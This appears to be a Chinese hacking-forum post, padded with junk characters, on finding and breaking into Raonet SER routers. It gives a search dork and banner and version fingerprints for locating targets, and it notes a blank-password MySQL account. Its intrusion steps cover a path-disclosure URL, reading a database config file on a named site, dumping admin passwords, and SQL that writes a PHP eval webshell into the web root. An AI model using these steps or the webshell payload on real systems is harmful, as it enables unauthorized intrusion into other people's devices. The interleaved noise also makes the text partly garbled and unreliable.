寻找存在漏洞的路由器方法:
, f! ]$ J: g4 [% H0 u7 J# G! f7 U
! ^! }& {6 }# W, _2 h& X: j( z1:google搜索'Raonet Subscriber Ethernet Router'
+ {& W2 I! f; x' l7 `( b
$ S! r0 y3 y. @2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001( C/ _; v2 O4 k9 d) @
b# A, U5 _. s$ q, j. V' N6 r, A: A* P3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
0 s; C' V' Z. e0 k+ q8 G
1 T3 L3 q6 Q# K( v1 l//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......! k( m9 L. O1 Z0 A0 O) C
+ c/ N! y J4 F& t
" N! s! L5 K& {2 n \+ ]6 g" P: Q% w: u. c
入侵步骤:5 g9 \; w7 \% C9 Y5 `
( ~7 R0 Z/ \2 e& ~1 H) O# x
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
5 c, R, x/ m8 E- H& b
, L0 K0 _3 Z7 w0 I( P8 y. K2 `/ z2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc# r9 i- c: O `) z) f+ f
3:得到密码后连接,查看GUI管理密码:' x- M8 M7 S1 z
use ser_500
3 `+ n1 p* ]/ jselect id,passwd from user;
; ~7 [* |7 ^5 S" [/ i$ n- v7 ]4:通过数据库写入webshell,执行命令:* I3 r' y9 j( ]2 Z. q9 d/ |( Q5 p9 m# S
use mysql;' T, L# @( Z7 n# I( }+ k! R
create table ok(cmd TEXT);
/ E1 Y D, b) X! @, w6 ~) pinsert into ok values("<?php @eval($_POST[cmd])?>");
+ n% s/ N" k3 v! |8 j/ H6 W0 wselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
# C. J" u1 J; {" ^drop table ok;! Y3 {6 M5 ~4 u9 o: g
; i a2 y, q3 w3 e& I! E) R5:连接后门shell.php + v6 A2 b+ c8 T1 P+ U7 n7 l% Z. E
+ T! z$ C! Q8 U8 G6. 搞定!
+ N! {6 Z/ O$ O5 ~! [( \
* Q6 Z% M' r& K- D! L& Y |